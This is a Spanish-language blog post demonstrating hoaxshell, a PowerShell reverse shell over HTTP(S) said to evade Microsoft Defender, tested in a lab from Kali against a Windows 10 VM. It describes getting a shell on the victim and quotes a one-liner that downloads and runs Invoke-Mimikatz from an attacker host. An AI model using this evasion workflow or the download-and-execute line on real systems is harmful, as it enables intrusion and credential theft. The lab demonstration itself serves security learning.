Hoaxhsell | AVR Bypass

Hoaxhsell | AVR Bypass

Esta vez traigo un script desarrollado en Python que realiza las funciones de “Encrypted Reverse Shell” desarrollada por el usuario t3l3machus y en el que existe un repositorio publico en github en el cual cualquiera puede acceder a la herramienta y realizar una PoC.

El enlace de descarga del script es el siguiente: https://github.com/t3l3machus/hoaxshell 

Como bien se comenta en el repositorio oficial:

hoaxshell es una shell reversa no convencional de Windows, actualmente no detectado por Microsoft Defender (26/08/2022) y posiblemente por otras soluciones antivirus, ya que se basa únicamente en el tráfico de http(s). La herramienta es fácil de usar, genera su propio payload de PowerShell y es compatible con el cifrado (ssl).

Hasta ahora, se ha probado en cajas de Windows 11 Enterprise y Windows 10 Pro completamente actualizadas”.

A modo de prueba de concepto expongo un pantallazo de mi propio sistema operativo, versión, etc…

La prueba de concepto se ha llevado a cabo simulando un atacante mediante una maquina virtual Kali Linux con una configuración de red NAT contra una maquina victima Windows 10 pro.

Los pasos que se han llevado a cabo han sido los siguientes:

  1. Descarga del repositorio oficial de Github de la tool hoaxshell.
  2. He instalado los requirimientos necesarios para que el script en python se ejecute correctamente y le he dado permisos de ejecución.
  3. Ejecuto el script pasándole mi IP como atacante
  4. Genera el payload que lo copio en la maquina victima con todos los sistemas antimalware ejecutándose, windows defender en tiempo real también ejecutándose, etc.
  5. Obtengo una reverse shell en la maquina atacante.
  6. Compruebo que me encuentro dentro del sistema de la maquina victima mediante comandos de powershell.

Para que sea mas intuitivo de seguir para un usuario he subido un video con la PoC a mi canal de Youtube.

Limitaciones

El shell se bloqueará si ejecuta un comando que inicia una sesión interactiva. Ejemplo:

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'
# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell
# In the same manner, you won't have a problem executing this:
> cmd /c dir /a
# But this will cause your hoaxshell to hang:
> cmd.exe

Entonces, si, por ejemplo, desea ejecutar mimikatz a través de hoaxshell, deberá invocar los comandos:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Para resumir, debe tener cuidado de no ejecutar un exe o cmd que inicie una sesión interactiva dentro del contexto de powershell de hoaxshell.

To top